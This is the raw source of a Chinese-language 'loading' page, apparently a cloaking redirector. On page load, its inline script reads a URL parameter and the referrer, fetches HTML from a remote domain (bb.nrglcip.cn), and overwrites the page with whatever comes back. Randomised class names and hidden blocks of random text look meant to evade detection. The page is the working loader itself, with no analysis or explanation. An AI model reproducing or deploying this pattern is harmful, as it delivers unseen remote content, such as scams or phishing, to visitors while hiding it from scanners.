<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .he2Y61299Nx {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .he2Y61299Nx .Y8XBcXHLHaw {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .he2Y61299Nx .content {
            line-height: 50px;
            text-align: center
        }

        .he2Y61299Nx .img {
            width: 100%
        }

        .he2Y61299Nx .rq0L5U1fZ {
            text-align: center
        }

        .he2Y61299Nx .rq0L5U1fZ span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .he2Y61299Nx .rq0L5U1fZ span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .he2Y61299Nx .rq0L5U1fZ span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .he2Y61299Nx .rq0L5U1fZ span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .he2Y61299Nx .rq0L5U1fZ span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .he2Y61299Nx .rq0L5U1fZ span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .he2Y61299Nx .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function RLfc6EDi9(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var W4Fp3An = RLfc6EDi9('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ W4Fp3An +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ W4Fp3An +".html?a=share";
		}
		
        c89P36x3M=url+"#"+new Date().getTime();
        c89P36x3M && function() {
            $.get(c89P36x3M, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<img  src='' style='display:none'>
<h1 style='display:none' >IahwvpSaVbw2AL2c9pAEyUKFdyBxpl</h1>
<h1 style='display:none' >IahwvpSaVbw2AL2c9pAEyUKFdyBxpl</h1>
<div style='display:none'>IvOFkSfU3HyRnj82Qhkie19iGmvXKUAPvRet4CRasX1UW2</div>
<img  src='' style='display:none'>
<span style='display:none'>ujDyO8SrouE9lVjBiOIzeJHq8S1AxGLNoe1YGJOSX287RCQWs</span><div class="he2Y61299Nx">
    <div class="Y8XBcXHLHaw">
        <div class="rq0L5U1fZ">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>IrVmx4u2DRLMQyrBzeRhOFJGpX3RzeJ</div>
<div style='display:none'>IrVmx4u2DRLMQyrBzeRhOFJGpX3RzeJ</div>
<b style='display:none' >Dsn4b96izy2CkMHS1LvN5T2hTHLqgmv9Qh5waGFeKsMqEUwddZDfMAEvP1PN</b>
<p  style='display:none'>hXBDmDmJOa88XbEmjfQJbBR6TkAnGtiFJGMSMsoDXvaKCBRpfOcrG1pPzQKD</p></body>
</html>